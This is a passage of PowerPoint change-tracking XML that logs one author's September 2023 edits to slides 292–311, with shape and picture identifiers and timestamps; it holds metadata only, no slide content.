          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:26:04.070" v="7549" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2120195576" sldId="292"/>
            <ac:spMk id="2" creationId="{8D9926A0-03BF-4D5F-8529-DF8AAAB6E007}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:26:12.035" v="7550" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2120195576" sldId="292"/>
            <ac:spMk id="3" creationId="{1B053F55-BE90-DC80-CA1E-5339E65959B9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:25:15.647" v="7484" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2120195576" sldId="292"/>
            <ac:spMk id="7" creationId="{268DE957-52A5-CB98-65E0-7527DC849F35}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:25:15.647" v="7484" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2120195576" sldId="292"/>
            <ac:spMk id="9" creationId="{ABA586F3-CAE9-7C62-A934-6AC45ECE176B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:25:15.647" v="7484" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2120195576" sldId="292"/>
            <ac:picMk id="4" creationId="{DD1604C6-748B-CF85-41FF-E1EC77E220A0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T00:07:26.893" v="6574" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2120195576" sldId="292"/>
            <ac:picMk id="5" creationId="{DAB01823-D7F6-7945-7A1B-78960BF4AB0E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:25:15.647" v="7484" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2120195576" sldId="292"/>
            <ac:picMk id="6" creationId="{CAD296A4-CEDA-8B4A-CE48-9AC018E3D27A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:25:15.647" v="7484" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2120195576" sldId="292"/>
            <ac:cxnSpMk id="8" creationId="{742069E0-910B-1C76-6551-100415C64435}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T02:16:35.068" v="8235" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2413654428" sldId="293"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T02:16:38.095" v="8236" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4075263879" sldId="294"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:25:46.259" v="7537" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1608890011" sldId="295"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T00:35:22.361" v="7132" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1608890011" sldId="295"/>
            <ac:spMk id="2" creationId="{EAE61901-E888-ECED-FA5E-B52C26AC518D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:25:46.259" v="7537" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1608890011" sldId="295"/>
            <ac:spMk id="3" creationId="{DA477A18-FA8C-BA8D-CDF9-8EB302252750}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T02:08:19.570" v="8151" actId="108"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1324098405" sldId="296"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:15:56.271" v="7234" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1324098405" sldId="296"/>
            <ac:spMk id="2" creationId="{0C6BAD58-E6B9-FD7E-67D0-5376E76CEDF4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T02:08:19.570" v="8151" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1324098405" sldId="296"/>
            <ac:spMk id="3" creationId="{06499DF8-E5FE-7DC3-061E-B5600E692424}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T02:18:41.883" v="8280" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3825525625" sldId="297"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod ord modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:34:45.811" v="7765" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="474749409" sldId="298"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:30:41.158" v="7668"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="474749409" sldId="298"/>
            <ac:spMk id="2" creationId="{2B4305A9-0377-CF01-0018-1277E23CC95C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:34:45.811" v="7765" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="474749409" sldId="298"/>
            <ac:spMk id="3" creationId="{3FB22526-D869-E4EC-9FEA-6DF4F2A31734}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T02:20:12.702" v="8283" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3701896917" sldId="299"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T02:20:12.702" v="8283" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3701896917" sldId="299"/>
            <ac:spMk id="2" creationId="{8D9926A0-03BF-4D5F-8529-DF8AAAB6E007}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T02:02:01.183" v="8006" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3701896917" sldId="299"/>
            <ac:spMk id="3" creationId="{1B053F55-BE90-DC80-CA1E-5339E65959B9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T00:31:05.352" v="9660" actId="12"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3905108292" sldId="300"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T00:28:40.984" v="9508" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3905108292" sldId="300"/>
            <ac:spMk id="2" creationId="{29000054-B7A4-7B0B-7CB2-1E48514EE7D5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T00:31:05.352" v="9660" actId="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3905108292" sldId="300"/>
            <ac:spMk id="3" creationId="{EC475928-A100-3D22-F805-72F3F96DB982}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T00:29:49.211" v="9584" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2219813349" sldId="301"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod ord modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T13:21:12.168" v="8365" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2437153944" sldId="302"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T13:21:12.168" v="8365" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2437153944" sldId="302"/>
            <ac:spMk id="4" creationId="{2F25D976-D8DB-4B5B-D06D-3A5716DDDD96}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T13:20:58.871" v="8339" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2437153944" sldId="302"/>
            <ac:picMk id="3" creationId="{73D20653-A05C-2FBB-3781-110638212E04}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod ord modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T14:27:51.960" v="11170"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2684392003" sldId="303"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T21:39:24.499" v="8482" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2684392003" sldId="303"/>
            <ac:spMk id="8" creationId="{BCBB48EB-049F-68A8-33CD-1F5CA9D97FB2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T21:36:35.036" v="8448" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2684392003" sldId="303"/>
            <ac:picMk id="3" creationId="{9250C427-985E-69D8-3CBB-D527BBD16B0C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T21:38:22.831" v="8451" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2684392003" sldId="303"/>
            <ac:picMk id="5" creationId="{34A84D51-3F6C-80D3-F910-147672B773F9}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T21:38:42.535" v="8454" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2684392003" sldId="303"/>
            <ac:picMk id="7" creationId="{AD1A6639-7EE6-B7A6-F44E-5F936401B826}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:22:30.371" v="11179" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1546748287" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:22:30.371" v="11179" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1546748287" sldId="304"/>
            <ac:spMk id="2" creationId="{C65370ED-BD53-3610-50A6-40B2FDCE87F5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:27:55.882" v="10014" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1546748287" sldId="304"/>
            <ac:spMk id="3" creationId="{B77B1E7C-DD8D-5BE2-0CF7-04FE8F29EE42}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T02:28:07.698" v="9052" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1546748287" sldId="304"/>
            <ac:picMk id="3" creationId="{B88E20E6-02B0-926A-FFF4-10362D98D95E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:28:55.747" v="10064" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3166106863" sldId="305"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:28:55.747" v="10064" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166106863" sldId="305"/>
            <ac:spMk id="2" creationId="{4545423F-F9A3-D6FB-3CB3-2BAD4E5E7653}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-22T18:32:32.331" v="8491" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166106863" sldId="305"/>
            <ac:picMk id="3" creationId="{A341C9F8-2A88-F935-FB15-32319E789667}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp new del mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T00:26:37.433" v="8516" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1493002176" sldId="306"/>
        </pc:sldMkLst>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-22T15:44:29.135" v="8489" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1493002176" sldId="306"/>
            <ac:picMk id="3" creationId="{C39FB29E-3ECC-FB40-9FDC-29149A186E67}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp new del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:08:14.793" v="8520" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3088348762" sldId="307"/>
        </pc:sldMkLst>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-22T18:41:02.380" v="8493" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3088348762" sldId="307"/>
            <ac:picMk id="3" creationId="{C6A22DE1-6172-2EB3-1F56-83AB58B94038}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:39:41.039" v="10177" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3854271230" sldId="308"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:39:41.039" v="10177" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3854271230" sldId="308"/>
            <ac:spMk id="2" creationId="{5A96A844-6288-8E0B-C671-6FBF763E619E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T02:25:31.533" v="9047" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3854271230" sldId="308"/>
            <ac:picMk id="3" creationId="{DF44A2C3-8C98-A645-09CB-9D1ED9DF0DCF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-22T19:46:51.650" v="8497"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3854271230" sldId="308"/>
            <ac:picMk id="4" creationId="{14362848-CDAB-690A-4D9F-5B92CD905FAA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:39:05.800" v="10139" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3854271230" sldId="308"/>
            <ac:picMk id="6" creationId="{C83076A7-23FB-120B-334B-09697D0D9112}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:29:24.365" v="10088" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2710305937" sldId="309"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:29:24.365" v="10088" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2710305937" sldId="309"/>
            <ac:spMk id="2" creationId="{02EBE7AE-1214-1579-FFB6-AB3E81B46DD7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-23T01:08:29.268" v="8525" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2710305937" sldId="309"/>
            <ac:spMk id="5" creationId="{D60DD6BC-3CE7-7D7D-D330-BB03AE4734BC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-22T19:59:34.165" v="8499" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2710305937" sldId="309"/>
            <ac:picMk id="3" creationId="{F0CC7BF7-8B17-383A-0840-498019C506CB}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod ord modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:22:59.090" v="11187" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1569057585" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:22:49.490" v="11183" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1569057585" sldId="310"/>
            <ac:spMk id="2" creationId="{1EDF0F4B-7036-DD71-57AD-15E765F51B70}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T19:22:59.090" v="11187" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1569057585" sldId="310"/>
            <ac:spMk id="4" creationId="{609BE877-0F68-0160-AD43-24F80077449E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:50:00.252" v="10287" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1569057585" sldId="310"/>
            <ac:picMk id="3" creationId="{1A512D91-1BB6-6634-DEE2-BB1D3DE95B95}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:49:59.081" v="10286" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1569057585" sldId="310"/>
            <ac:picMk id="5" creationId="{2C95933F-3E2A-F09B-111D-0ACF6A870B7E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:58:37.878" v="10612" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2156313096" sldId="311"/>
        </pc:sldMkLst>
